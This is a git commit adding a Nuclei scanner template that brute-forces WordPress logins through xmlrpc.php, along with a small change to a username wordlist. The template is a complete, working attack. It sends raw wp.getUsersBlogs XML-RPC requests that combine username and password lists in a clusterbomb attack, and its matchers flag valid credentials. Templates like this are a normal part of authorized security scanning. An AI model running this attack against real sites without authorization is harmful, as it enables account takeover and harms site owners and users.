Added wordpress-xmlrpc-brute-force.yaml (#3445)

* wp-xmlrpc-brute-force.yaml file was added A Nuclei template for bruteforcing username and password through XMLRPC. * wp-xmlrpc-brute-force.yaml file added A Nuclei template for wordpress username and password Bruteforcing throught xmlrpc.php * wp-xmlrpc-brute-force.yaml file added A Nuclei template for wordpress username and password Bruteforcing throught xmlrpc.php * Revert "wp-xmlrpc-brute-force.yaml file was added" This reverts commit c0e4ca75a6ddbcf65e9443849a05c7b8f2625af9. * few fixes * Added wordpress user and pass list * improved matcher Co-authored-by: sandeep <sandeep@projectdiscovery.io>
2021-12-29 20:04:23 +03:30 · 2021-12-29 20:04:23 +03:30 · 80489bce76
parent ce97393f95
commit 80489bce76
2 changed files with 51 additions and 0 deletions
--- a/helpers/wordlists/wp-users.txt
+++ b/helpers/wordlists/wp-users.txt
@ -9,3 +9,4 @@ root
 support
 sysadmin
 test
+wordpress
--- a/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml
+++ b/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml
@ -0,0 +1,50 @@
+id: wordpress-xmlrpc-brute-force
+
+info:
+  name: Wordpress XMLRPC.php username and password Bruteforcer
+  author: Exid
+  severity: high
+  description: Ths template bruteforces username and passwords through xmlrpc.php being available.
+  reference:
+    - https://bugdasht.ir/reports/3c6841c0-ae4c-11eb-a510-517171a9198c
+    - https://www.acunetix.com/vulnerabilities/web/wordpress-xml-rpc-authentication-brute-force/
+  tags: wordpress,php,xmlrpc,fuzz
+
+requests:
+  - raw:
+      - |
+        POST /xmlrpc.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Length: 235
+
+        <?xml version="1.0" encoding="UTF-8"?>
+         <methodCall>
+           <methodName>wp.getUsersBlogs</methodName>
+           <params>
+             <param>
+               <value>{{username}}</value>
+             </param>
+               <param>
+             <value>{{password}}</value>
+               </param>
+           </params>
+         </methodCall>
+
+    attack: clusterbomb
+    payloads:
+      username: helpers/wordlists/wp-users.txt
+      password: helpers/wordlists/wp-passwords.txt
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - 'url'
+          - 'xmlrpc'
+          - 'isAdmin'
+        condition: and